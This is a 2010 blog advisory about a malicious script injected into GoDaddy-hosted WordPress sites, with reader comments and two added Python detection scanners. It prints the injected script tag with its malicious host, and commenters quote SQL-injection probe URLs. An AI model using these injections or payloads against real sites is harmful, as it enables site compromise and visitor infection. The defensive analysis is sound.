WPSecurityLock – Malware removal & WordPress security services

Breaking News: WordPress Hacked with holasionweb on Go Daddy!

May 12, 2010 By Regina Smola 47 Comments

WordPress sites self-hosted on GoDaddy.com are reporting being maliciously hacked today with <script src="http:// holasionweb .com/ oo .php"></script>! (Note: We have added spaces in the URL on purpose.)

Warning: This is dangerous malware! Anyone visiting an infected website can get their computer infected if they do not have an up-to-date anti-virus program using the latest threat definitions. If you receive a message to download anything when visiting an infected site, do NOT click “yes” or “okay” to download.

If your website is infected, put it down for maintenance immediately. There are instructions on how to do so at this post.

We have also received reports that this affected not only WordPress installations, but also Joomla and other PHP-based platforms.

Here are the holasionweb symptoms:

  1. Infected sites get redirected to a fake AV (scareware).
  2. Some home pages are not showing the virus, but when clicking on a post or page, you will see the redirect (below).
  3. Redirects to a blank page at www.1.realsafe-23.net/?……
  4. Source code reveals <script src="http:// holasionweb .com/ oo. php"> in the header section </head> of the infected pages.
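A way to check for symptoms 2 and 4 across several pages at once, written as an added example (it is not code from WPSecurityLock or Sucuri). It lists every external script a page loads and flags hosts the site owner has not approved; the hosts blog.example, cdn.example.net and injected.example and the sample pages are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptCollector(HTMLParser):
    """Record every <script src=...> and whether it sits in <head> or <body>."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.section = "head"
        self.scripts = []  # list of (section, src)

    def handle_starttag(self, tag, attrs):
        if tag == "body":
            self.section = "body"
        elif tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.scripts.append((self.section, src.strip()))


def foreign_scripts(html, site_host, allowed_hosts=()):
    """Return (section, src) for scripts loaded from hosts that are not approved."""
    trusted = {site_host.lower(), *(h.lower() for h in allowed_hosts)}
    parser = ScriptCollector()
    parser.feed(html)
    hits = []
    for section, src in parser.scripts:
        host = urlparse(src).hostname  # None for relative URLs, which are local
        if host and host.lower() not in trusted:
            hits.append((section, src))
    return hits


def audit_pages(pages, site_host, allowed_hosts=()):
    """pages maps URL path -> HTML. Only pages with findings are returned.

    Checking posts and pages as well as the home page matters here because
    the home page may look clean while inner pages carry the injected tag.
    """
    report = {}
    for path, html in pages.items():
        hits = foreign_scripts(html, site_host, allowed_hosts)
        if hits:
            report[path] = hits
    return report


# Constructed sample pages (not captured from a real site).
SAMPLE_PAGES = {
    "/": '<html><head><title>Home</title>'
         '<script src="/wp-includes/js/jquery/jquery.js"></script>'
         '</head><body>home</body></html>',
    "/2010/05/a-post/": '<html><head><title>Post</title>'
         '<script src="http://cdn.example.net/lib.js"></script>'
         '<script src="http://injected.example/oo.php"></script>'
         '</head><body>post</body></html>',
    "/about/": '<html><head><title>About</title></head><body>about'
         '<script src="//injected.example/oo.php"></script></body></html>',
}

if __name__ == "__main__":
    findings = audit_pages(SAMPLE_PAGES, "blog.example", ["cdn.example.net"])
    for path, hits in findings.items():
        for section, src in hits:
            print(f"{path}: unapproved script in <{section}>: {src}")
```
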


How to fix your hacked WordPress site on GoDaddy.com

  • We have written up instructions on how to remove malware and restore your WordPress site here.
  • David Dede, of Sucuri.net, has written more information about this malware and created a simple clean up solution here.

We have informed Go Daddy's Security Department. We will continuously add updates to this post as they become available.

UPDATE 5/12/2010 at 10:15am: We have heard from Go Daddy. They are aware of this current issue and will be providing us with information soon.

UPDATE 5/12/2010 at 12:00 pm: Here's a statement we just received from Go Daddy to share with you.

Bloggers,

We've identified and are working with the provider and hosting company from where the attacks are originating. With the help of the blogging community, we're close to breaking additional details related to recent malware attacks. Additional information will be provided to the other hosting providers involved in the same situation and the blogging community as available and as appropriate.

In the meantime, we've posted some perspective, additional information and quotable tidbits on the Go Daddy Blog: What's Up with Go Daddy, WordPress, PHP Exploits and Malware?

– Noah Plumb
Go Daddy Communications

UPDATE 5/11/2010 at 2:00pm: We are receiving reports that other hosting companies are infected with this malware. So it is spreading. Thank you for all your comments. We are doing our best to read and approve incoming comments, while we fix hacked websites.

VERY IMPORTANT!!! UPDATE 5/11/2010 at 5:20pm: Change your database password immediately. We are finding some sites that have mystery files containing database information that was copied from the wp-config.php file.

Securely yours,

Regina Smola

Filed Under: Malware and Virus Alerts Tagged With: Go Daddy base64_, Go Daddy hacked again, holasionweb-oo.php, how to fix hacked wordpress, how to wordpress, Joomla, realsafe-23.net, wordpress hacked on Go Daddy

Comments

  1. Genner says

    May 12, 2010 at 9:44 am

    Hello
    I followed all the instructions on this blog to secure my blogs, but they have been hacked again for the 3rd time. What is going on with Go Daddy???????

    Reply
  2. Hacked Again says

    May 12, 2010 at 9:49 am

    Hacked again!!!!
    Site hosted by GoDaddy AND it’s not a WP site.

    The first thing I do in the morning, is connecting to FTP server to check out the date when files were modified.

    If I see a recent modification to all files (usually happens between 1AM and 4 AM), I just copy over files from my backup.

    I'm really tired of all these recent hacks. I guess it’s time to move all my sites to a new hosting company. 🙁

    Well… looks like all hacked files on the first site were overwritten successfully, now I have to check 8 more sites.

    Reply
    • kathy says

      May 12, 2010 at 2:24 pm

      Here here I agree! I’ll be moving all of my accounts very very soon!

      Reply
  3. John Rothstein says

    May 12, 2010 at 2:49 pm

    I got attacked twice. I am moving my hosting away from godaddy. I was referred to a guy that promptly removed the viruses for me, not once but twice. He also restored my blog which was lost after following the advice of the hacks at godaddy. Thank God I had backed my blog up or my blog would have been lost. Here is his name and email: [link edited]

    Mine was a little more complicated than just the virus removal the first time around. But today he removed the virus in minutes. I recommend his services and I do not make a penny on this referral. Good luck!

    John Rothstein

    Reply
  4. Seth says

    May 12, 2010 at 9:52 am

    I’ve found the script added in wp_footer, not wp_head.

    Reply
    • kathy says

      May 12, 2010 at 2:26 pm

      It will be more than just the footer, check your complete wp_content file. All of my current template files were hit along with five other sites, not wordpress, however written in php.

      Reply
      • Economists Do It With Models says

        May 12, 2010 at 4:34 pm

        It appears to me that this thing modified the .htaccess file and then stuck in an encoded script at the beginning of every php file. Not hard to remove, but super annoying.

        Reply
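A read-only scan for the pattern reported in the comments above (an encoded script at the beginning of every PHP file, a modified .htaccess, and file modification times clustered together), written as an added example that is not from the commenters or the blog. The eval(base64_decode("...")) shape, the one-hour window, and the file names and host in the constructed sample tree are assumptions.

```python
import base64
import os
import re
import tempfile

# Assumed injection shape (no sample is shown on this page): a PHP open tag
# followed straight away by eval(base64_decode("...")).
LEADING_EVAL = re.compile(
    rb'\A\s*<\?php\s*eval\s*\(\s*base64_decode\s*\(\s*'
    rb'["\']([A-Za-z0-9+/=]+)["\']\s*\)\s*\)\s*;')


def scan_webroot(root, window_seconds=3600):
    """Flag .php files that start with an encoded eval, plus .htaccess files
    modified within window_seconds of any flagged file."""
    infected, htaccess = [], []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if name == ".htaccess":
                htaccess.append((path, os.path.getmtime(path)))
            elif name.lower().endswith(".php"):
                with open(path, "rb") as fh:
                    head = fh.read(1 << 20)  # the injection sits at the top
                match = LEADING_EVAL.match(head)
                if not match:
                    continue
                try:
                    # Decoded for the report only; the payload is never run.
                    decoded = base64.b64decode(match.group(1), validate=True)
                except ValueError:
                    decoded = b""
                infected.append({
                    "path": path,
                    "mtime": os.path.getmtime(path),
                    "preview": decoded[:60].decode("latin-1"),
                })
    times = [f["mtime"] for f in infected]
    suspect_htaccess = sorted(
        p for p, mt in htaccess
        if any(abs(mt - t) <= window_seconds for t in times))
    return sorted(infected, key=lambda f: f["path"]), suspect_htaccess


def demo():
    """Build a constructed webroot in a temp dir, scan it, return relative paths."""
    payload = base64.b64encode(
        b'echo "<script src=http://injected.example/oo.php></script>";')
    injected = (b"<?php eval(base64_decode('" + payload + b"')); ?>\n"
                b"<?php get_header(); ?>\n")
    samples = {  # relative path -> (content, modification time)
        "index.php": (injected, 1_000_000),
        "wp-content/themes/t/footer.php": (injected, 1_000_050),
        "clean.php": (b"<?php echo 'ok';\n", 1_000_020),
        ".htaccess": (b"# rewritten in the same run\n", 1_000_100),
        "old/.htaccess": (b"# untouched\n", 500_000),
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, (data, mtime) in samples.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(data)
            os.utime(path, (mtime, mtime))
        infected, htaccess = scan_webroot(root)

        def rel(p):
            return os.path.relpath(p, root).replace(os.sep, "/")

        return ([rel(f["path"]) for f in infected],
                [rel(p) for p in htaccess],
                infected[0]["preview"])


if __name__ == "__main__":
    print(demo())
```

The scan only reports; restoring flagged files from a known-good backup and rotating the database password, as the post advises, remain separate steps.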
  5. aika says

    May 12, 2010 at 10:13 am

    I am also continuously being hacked, and on a GoDaddy server. It is starting to get tiring, looking for a permanent solution.

    Reply
  6. Peter Souza IV says

    May 12, 2010 at 10:35 am

    The hack allows them to modify all .php files on the entire server, not just your hosted package.

    I don’t even use WordPress, but because I use GoDaddy for shared webhosting, my site was hacked along with everyone else’s accounts on that machine.

    I’m moving.

    Reply
    • Hacked Again says

      May 12, 2010 at 11:01 am

      The hack allows them to modify all .php files on the entire server, not just your hosted package.

      Yep, that’s what I’m thinking too.

      I’m moving.

      I guess me too. I’m tired of GoDaddy.

      I don’t even use WordPress, but because I use GoDaddy for shared webhosting, my site was hacked along with everyone else’s accounts on that machine.

      That would explain why my sites running completely different systems get hacked too.

      Anyone, please give us an idea of good hosting company??

      Reply
      • Seriously? says

        May 12, 2010 at 11:13 am

        I hear inmotionhosting is pretty good. Godaddy is cheap but I would rather pay a little extra for solid tech support than none at all. I hope godaddy goes under, I have lost a ton of time and money this month because of this.

        Reply
      • Stephen Akins says

        May 12, 2010 at 12:00 pm

        I use Lunar Pages a fair bit. They’re reasonably priced, the servers are fast, and the support is good.

        Reply
  7. Seriously? says

    May 12, 2010 at 10:43 am

    Seriously? My website is hacked for the 3rd time in less than 1 month. It's only a matter of time before I get banned from Google and years of work go down the drain. What is Godaddy even doing about this? Worst tech support on the planet, half of them don’t even know how to use a computer, let alone fix a hacked website.

    I tried your ‘quick fix’ and although it did remove the code, now I can’t even login to my wp-admin. I keep getting a pluggable.php error. :S

    Reply
    • Kristi says

      May 12, 2010 at 12:10 pm

      Not that it makes things better, but if you do get the Google warning added to your site because of malware, it takes about 1 – 2 days to get removed. You have to contact Google immediately after your site is cleared to get it removed. It happened to a blog on Network Solutions because he went the route of letting the hosting company clean it, which took a day. If you get your site cleaned up within 12 hours it seems, Google doesn’t have enough time to catch on.

      Reply
  8. Hacked Again says

    May 12, 2010 at 10:52 am

    WOW!!!!!

    6 sites hacked earlier this morning!!!!

    All hosted by GoDaddy.

    4 wordpress sites.
    2 completely different publishing systems.

    Guys, I'm starting to think some unhappy GoDaddy employee is modifying our sites. Is it possible?

    Reply
    • Allen says

      May 12, 2010 at 10:14 pm

      It would seem like this could possibly be an inside job – but other hosting companies are being hit too. I am wondering if the hosting companies are talking to each other and if there is any kind of consortium of security experts working together on this.

      Reply
  9. JerryBates says

    May 12, 2010 at 11:11 am

    I went through this on some of my client sites on Friday and now I get to do it all over again today?!? I’ve notified GoDaddy (http://www.godaddy.com/securityissue) about it and I wonder if they will blame their customers for having out-of-date WordPress versions again, just as they did for the zettapetta exploit.

    My WordPress was current then and it’s current now, so it’s obvious that GoDaddy is better at pointing fingers than they are at addressing the real problem. I’m now happily an ex-customer and don’t worry, I won’t stay long enough to let the door hit my ass on the way out!

    Reply
  10. Mart says

    May 12, 2010 at 11:21 am

    From what I can see, the WP install I have on (Godaddy shared linux) hosting hasn’t been infected at all, but it IS running incredibly slowly. Would that be because other sites on my shared hosting account have been infected? I’ve only noticed it in the past few days.

    Reply
    • Economists Do It With Models says

      May 12, 2010 at 4:24 pm

      I noticed it too and was wondering what was going on. It’s been like that for about a week for me, even though my site didn’t get compromised until this morning.

      Reply
  11. InglesTotal says

    May 12, 2010 at 11:49 am

    HACKED AGAIN!!! Well, I am starting to look for a new hosting company like Gator. This is just unbelievable. It looks like an “in house” job to me. 4th time attacked in total. Finally found the script in wp-footer.

    What I did:

    1) Went to wp-config and cleaned it (so I could log into wp-admin)
    2) Reinstalled wp with the upgrade
    3) Deleted all my template and installed a brand new. (And I had a copy of my index files, home etc clean so that was easy)
    4) Reinstalled plugins
    5) Searched for any php files not covered in the process.

    Now it is working but seems like I have to expect it to happen again. I thought it was the same code but it is a whole new attack which means GoDaddy can’t figure the problem out. I am going to call GATOR and see how I can make the switch. I hate messing with my files on the server and database but I think there is no other way.

    Reply
  12. kev grant says

    May 12, 2010 at 12:20 pm

    lol, yep, same hosting package (one out of 3 different ones) done again, the 3rd time in 3 weeks, even as the sites are scheduled into the work queue to be moved imminently.

    all WP installations up-to-date and super securitied up. nothing to do with WP whatsoever, a particular machine at Godaddy must be permanently compromised, the hacker can just dial in again at will and do it again whenever they fancy.

    I must say after years with no trouble from Godaddy I am shocked at just how $hit they are at this.

    Reply
    • InglesTotal says

      May 12, 2010 at 1:03 pm

      So what are our options? Is it time to move? Should we sue? I lost money, clients and traffic. Who wants to go back to an infected site. Even when I tell them that it is cleaned they doubt ever coming back. NOT TO BLAME!

      Reply
      • Seriously? says

        May 12, 2010 at 1:48 pm

        I agree, we should be entitled to something for having to deal with all of this. I have lost money, traffic and my blog's reputation because of this. Every single one of my pages this morning was redirecting to a trojan download. I seriously feel bad for any of my visitors that have to deal with this.

        This has been going on for way too long and it needs to stop NOW.

        Reply
        • Lonely Conservative says

          May 12, 2010 at 2:10 pm

          My sentiments, exactly. Lost money, lost traffic, lost reputation. My blog was taking off. Every time these hackers hit it sets me back more.

          Reply
  13. Regina says

    May 12, 2010 at 5:29 pm

    VERY IMPORTANT!!! UPDATE 5/11/2010 at 5:20pm: Change your database password immediately. We are finding some sites that have mystery files containing database information that was copied from the wp-config.php file.

    Reply
    • Henry says

      May 12, 2010 at 6:23 pm

      Gee… I won’t be able to get home till about 9pm. (in about 3 hours) Am I in trouble…. man this is such a huge problem. I am worried now they can get my database. So now they can steal our crap pretty much huh

      Reply
    • Seriously? says

      May 12, 2010 at 6:33 pm

      Thanks for all the updates. WPsecuritylock has been right on top of this since day 1.

      Reply
    • Hacked Again says

      May 12, 2010 at 10:11 pm

      VERY IMPORTANT!!! UPDATE 5/11/2010 at 5:20pm: Change your database password immediately. We are finding some sites that have mystery files contain database information that was copied from the wp-config.php file.

      I’ll do it just in case but I really doubt changing the password will help.
      How does changing the DB password help if they can access wp-config.php???
      Why do the hackers modify only site files but not touch databases if they have full access?

      Reply
  14. InglesTotal says

    May 12, 2010 at 3:43 pm

    So the latest update here says that it is spreading to other hosting companies. Therefore maybe it is not time to move just yet since using my logic, the first to get the problem usually is the first to solve it. Being go daddy hit so many times they have to be learning. Well… if this truly is going worldwide maybe we are all screwed. HIRE SOME HACKERS TO HACK THE HACKERS DANG IT

    Reply
  15. James says

    May 12, 2010 at 4:20 pm

    How do we know if our website has been hacked or not? I’m just starting out with all this internet stuff but got a warning message when I was searching on some site that AVG encountered this virus. Does this mean that I went to a website that was hacked or my websites have been? I just don’t understand but it would be a great help if you guys could help me out.

    Reply
    • Regina says

      May 12, 2010 at 4:38 pm

      James,

      Thanks for your question. I suggest you get your site monitored for malware to be safe. Here’s our discounted affiliate link: https://wpsecuritylock.com/sucuri. We use them for our website and they rock!

      Reply
    • Kristi says

      May 13, 2010 at 10:18 am

      If you want to check your own site or a site that you are on that is PHP based (like WordPress), just view the page source and scroll down to the very bottom. If you see a call for a PHP script near the end (like the holasionweb one mentioned in the first paragraph of this post), then the site is hacked.

      Reply
  16. Economists Do It With Models says

    May 12, 2010 at 4:21 pm

    I had this problem happen to my site, so I contacted GoDaddy to inform them of the problem. I was very careful not to request any help in actually cleaning up the mess, and I said that I just wanted them to work on their security and not allow it to happen again.

    I got the following response AFTER I had cleaned everything:

    Dear Sir/Madam,

    Thank you for contacting the Hosting Security Team.

    We have checked and confirmed that your hosting account economistsdoitwithmodels.com had php files which contained a javascript malware injection. We have since removed the contaminated code as a courtesy. Please note, that this is not a permanent solution because it does not remove the vulnerability that allowed the malicious code to be inserted.

    To address the specific vulnerability, please ensure that you fully upgrade all installations of web based software such as WordPress or Joomla to the most recent version.

    Ummmmmmm…let’s see. First, plenty of people with WordPress 2.9.2 are reporting this problem, so the GoDaddy people are clearly trying to get people to think that it’s not their fault. Second, I’m not sure I want the GoDaddy people removing anything from my files, ESPECIALLY since they did this without my permission and even without warning. I can only imagine the versioning issues that this could have created.

    For the record, if you want to scrub files but don’t want to deal directly with Perl or anything, there’s freeware called TextCrawler that is super helpful. (It can deal with regular expressions and whatnot.) The downside is that you have to get the files to your local machine and back.

    Reply
    • enio san says

      May 13, 2010 at 3:52 pm

      Hey,
      Same thing here… I called them yesterday, very early morning to report the problem, but my site is not on WP, but Modx CMS. Just like you, I just wanted to let them know about the attacks on their servers… first, this guy didn't seem to care or even believe me.
      I sent them an email and they said that it must have been my fault for using a very easy to hack password.
      I am really thinking on moving to another host, like MediaTemple, and perhaps get my own virtual server or something.

      Reply
  17. Rick says

    May 12, 2010 at 4:49 pm

    Looks like I moved hosts just in time. After being hacked twice in two weeks on GoDaddy – and then listening to them tell the world it was our fault – I had to go. I will not pay money to a company to be abused like that.

    Amazing how I have the same websites, same files and took the same steps as I did over at GoDaddy, yet I am fine now.

    I moved multiple websites which took a good deal of time. Like the others who have posted above, I also lost sales, visitors, MONEY and much time cleaning up the hackings.

    GoDaddy, it is time to step up and admit your vulnerabilities. Stop blaming WordPress. Stop blaming your hard working customers. And FIX THE PROBLEM.

    I’m looking at the poor folks above who are still dealing with this, and it makes me sick.

    To those of you looking to switch hosts: do your homework. Get personal referrals to legitimate and secure hosting providers. Do not trust affiliate review sites. And google the heck out of any company you plan to use.

    I had decided on one company and upon digging into some research, I found they had their own round of attacks at the start of this year. While no hosting company is immune to hacking, the instances you find should be minimal and not the norm. Also, I looked very carefully at the companies’ responses to customer complaints.

    And when you call the company to migrate, tell them that you’ve been hacked multiple times on your current host. Ask them what they are doing to prepare for these attacks, and have them personally walk you through securing your site so that you can minimize your risk.

    Any hosting company worth your money will do this for you.

    It also wouldn’t hurt to point them to the YouTube video WPSecurityLock posted of a hacker helping himself to websites hosted on Network Solutions. Tell them you’re not going to put up with that crap.

    Migrating is not hard. Don’t be afraid to leave a host who refuses to take your business seriously. We all deserve better.

    Reply
    • Kristi says

      May 13, 2010 at 10:22 am

      I did talk to someone yesterday who was in the same boat as you are – same files, same site, moved from Godaddy to HostGator and was not hacked. She didn’t take any extra security measures, change passwords, etc. She just moved hosts and managed to miss the attack that my site has gotten for the third time in a month, even though I have security in place and am fully upgraded to the latest version. So moving is certainly not a bad idea.

      Reply
  18. Paul says

    May 12, 2010 at 4:52 pm

    I found the easiest solution to this hack here:
    http://stackoverflow.com/questions/2798745/how-can-i-remove-an-iframe-virus-from-all-of-php-files-on-my-website

    It took about 2 minutes to clean. Very grateful as last time we were hit (last week) it took me hours to fix!

    Reply
  19. Allen says

    May 12, 2010 at 7:58 pm

    To everyone that has a service request in with WPSecurityLock:
    With today’s brute force, malicious attacks, we are backed up on cleaning hacked sites.

    Please be patient.
    If you are able, upload an Index.html file saying your site is in maintenance.

    Go to our previous post and follow the steps in order – https://wpsecuritylock.com/breaking-news-wordpress-hacked-with-zettapetta-on-dreamhost/

    Reply
  20. Hacked Again says

    May 12, 2010 at 10:12 pm

    Do you think moving from shared hosting to dedicated hosting will help?

    Reply
    • Alex Sysoef says

      May 13, 2010 at 7:20 am

      It will but only if you actually KNOW how to secure your own server. I use dedicated servers and VPS and can tell you first hand that even with all my technical knowledge it is very time consuming, although – more rewarding 🙂 and I also have no one to blame but myself if there is a security problem.

      So, make your choice carefully and after considering what you want to do – run business or be sysadmin? 😉

      Cheers!

      Reply
  21. Vladimir says

    May 13, 2010 at 10:39 am

    There is a better, faster and easier solution to this holasionweb problem, just read it at tintation.com

    Reply
    • Regina says

      May 13, 2010 at 12:56 pm

      Hi Vladimir,

      Thanks for your comment. The script is great and fast. But… did you check your server to delete the trigger php file? This contains a different injected code that usually is found the day before it shoots into your php files.

      Reply
      • InglesTotal says

        May 13, 2010 at 4:18 pm

        Where do we look for this? I need to find it too I guess.

        Reply
  22. gavacho says

    May 13, 2010 at 10:01 pm

    I found a VERY suspicious looking file (I deleted it) on my website named gdform.php. Here is the code it contained (it also had the base 64 encoded code identical to all the other php files at the top)

    <?php
    $request_method = $_SERVER["REQUEST_METHOD"];
    if($request_method == "GET"){
        $query_vars = $_GET;
    } elseif ($request_method == "POST"){
        $query_vars = $_POST;
    }
    reset($query_vars);
    $t = date("U");

    $file = $_SERVER['DOCUMENT_ROOT'] . "/../data/gdform_" . $t;
    $fp = fopen($file,"w");
    while (list ($key, $val) = each ($query_vars)) {
        fputs($fp,"\n");
        fputs($fp,"$val\n");
        fputs($fp,"\n");
        if ($key == "redirect") { $landing_page = $val;}
    }
    fclose($fp);
    if ($landing_page != ""){
        header("Location: http://".$_SERVER["HTTP_HOST"]."/$landing_page");
    } else {
        header("Location: http://".$_SERVER["HTTP_HOST"]."/");
    }

    ?>

    I wonder how they were able to place this file in my document root?

    Reply
  23. Michelle says

    May 14, 2010 at 11:41 am

    I just had someone try and log in using the backend with an IP 188.72.213.44!

    The webpage was my domain followed by /wp-content/plugins/wordspew/wordspew-rss.php?id=-998877+UNION+SELECT+0,1,0x6875616B,3,4,5–

    and the Offending Parameter: id = -998877 UNION SELECT 0,1,0x6875616B,3,4,5–

    I don’t have the wordspew plugin.

    Reply
  24. Michelle says

    May 14, 2010 at 12:11 pm

    He also tried using this plugin too

    wp-content/plugins/wp-adserve/adclick.php?id=-1+union+select+0x6875616B

    Reply
  25. Jim Johnson,CRS says

    May 22, 2010 at 9:17 pm

    Thanks for fixing my blog!

    Reply
